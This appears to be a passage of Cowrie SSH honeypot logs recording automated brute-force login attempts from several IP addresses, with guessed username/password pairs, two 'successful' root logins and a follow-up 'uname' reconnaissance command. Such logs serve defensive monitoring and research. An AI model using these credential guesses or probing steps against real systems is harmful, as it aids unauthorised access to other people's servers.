{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:39.798015Z","src_ip":"212.227.235.229","session":"c2bbc0db479d"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:40.551937Z","src_ip":"212.227.235.229","session":"c2bbc0db479d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:41.803933Z","src_ip":"212.227.235.229","session":"c2bbc0db479d"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"letmein","message":"login attempt [ftptest/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:41.884726Z","src_ip":"212.227.125.160","session":"983cd41f9758"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:43.309675Z","src_ip":"212.227.125.160","session":"983cd41f9758"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"14.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:46.475064Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.session.closed","duration":"92.3","message":"Connection lost after 92.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:46.719276Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49222,"dst_ip":"1.2.3.4","dst_port":22,"session":"20103fbe17f8","protocol":"ssh","message":"New connection: 41.226.27.251:49222 (1.2.3.4:22) [session: 20103fbe17f8]","sensor":"my-vps","timestamp":"2025-08-31T02:53:52.270719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:52.345021Z","src_ip":"41.226.27.251","session":"20103fbe17f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:52.345880Z","src_ip":"41.226.27.251","session":"20103fbe17f8"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:52.526517Z","src_ip":"41.226.27.251","session":"20103fbe17f8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:53.773162Z","src_ip":"41.226.27.251","session":"20103fbe17f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52020,"dst_ip":"1.2.3.4","dst_port":22,"session":"06fa69f27ae6","protocol":"ssh","message":"New connection: 212.227.235.229:52020 (1.2.3.4:22) [session: 06fa69f27ae6]","sensor":"my-vps","timestamp":"2025-08-31T02:54:04.839033Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50258,"dst_ip":"1.2.3.4","dst_port":22,"session":"48bd1da367c3","protocol":"ssh","message":"New connection: 41.226.27.251:50258 (1.2.3.4:22) [session: 48bd1da367c3]","sensor":"my-vps","timestamp":"2025-08-31T02:54:12.845532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:12.846804Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:54:12.896337Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:54:13.026561Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:54:13.053916Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:54:13.192395Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:54:13.193184Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:13.243737Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:13.244867Z","src_ip":"41.226.27.251","session":"48bd1da367c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:14.844783Z","src_ip":"212.227.235.229","session":"06fa69f27ae6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:54:14.846172Z","src_ip":"212.227.235.229","session":"06fa69f27ae6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38770,"dst_ip":"1.2.3.4","dst_port":22,"session":"28477a86bf52","protocol":"ssh","message":"New connection: 212.227.235.229:38770 (1.2.3.4:22) [session: 28477a86bf52]","sensor":"my-vps","timestamp":"2025-08-31T02:54:17.634205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:18.519031Z","src_ip":"212.227.235.229","session":"28477a86bf52"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:54:18.519795Z","src_ip":"212.227.235.229","session":"28477a86bf52"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:18.562068Z","src_ip":"212.227.125.160","session":"972df432c95e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":25079,"dst_ip":"1.2.3.4","dst_port":22,"session":"29940f8db27d","protocol":"ssh","message":"New connection: 80.94.95.15:25079 (1.2.3.4:22) [session: 29940f8db27d]","sensor":"my-vps","timestamp":"2025-08-31T02:54:21.360182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:54:21.361235Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:54:21.427026Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer","message":"login attempt [sawyer/sawyer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:21.774149Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1","message":"login attempt [sawyer/sawyer1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:22.841969Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer123","message":"login attempt [sawyer/sawyer123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:23.910165Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"welcome","message":"login attempt [ftptest/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:24.453260Z","src_ip":"212.227.235.229","session":"28477a86bf52"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer1234","message":"login attempt [sawyer/sawyer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:24.977706Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer12345","message":"login attempt [sawyer/sawyer12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:26.045130Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:26.200601Z","src_ip":"212.227.235.229","session":"28477a86bf52"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:27.112734Z","src_ip":"80.94.95.15","session":"29940f8db27d"}
{"eventid":"cowrie.session.closed","duration":"73.6","message":"Connection lost after 73.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:28.288070Z","src_ip":"212.227.125.160","session":"972df432c95e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:54:29.823190Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:54:29.823975Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:30.515687Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.session.closed","duration":"101.3","message":"Connection lost after 101.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:30.516996Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46858,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84bf2584ea2","protocol":"ssh","message":"New connection: 41.226.27.251:46858 (1.2.3.4:22) [session: b84bf2584ea2]","sensor":"my-vps","timestamp":"2025-08-31T02:54:32.840815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:32.841810Z","src_ip":"41.226.27.251","session":"b84bf2584ea2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:54:32.885915Z","src_ip":"41.226.27.251","session":"b84bf2584ea2"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:33.019068Z","src_ip":"41.226.27.251","session":"b84bf2584ea2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:34.309985Z","src_ip":"41.226.27.251","session":"b84bf2584ea2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57696,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4dd89e822ca","protocol":"ssh","message":"New connection: 212.227.125.160:57696 (1.2.3.4:22) [session: d4dd89e822ca]","sensor":"my-vps","timestamp":"2025-08-31T02:54:39.600199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:40.059266Z","src_ip":"212.227.125.160","session":"d4dd89e822ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:54:40.060249Z","src_ip":"212.227.125.160","session":"d4dd89e822ca"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"welcome","message":"login attempt [ftptest/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:54:42.111831Z","src_ip":"212.227.125.160","session":"d4dd89e822ca"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:54:43.935603Z","src_ip":"212.227.125.160","session":"d4dd89e822ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45736,"dst_ip":"1.2.3.4","dst_port":22,"session":"e33d46fa2c5f","protocol":"ssh","message":"New connection: 212.227.235.229:45736 (1.2.3.4:22) [session: e33d46fa2c5f]","sensor":"my-vps","timestamp":"2025-08-31T02:54:50.439808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:54:50.441373Z","src_ip":"212.227.235.229","session":"e33d46fa2c5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.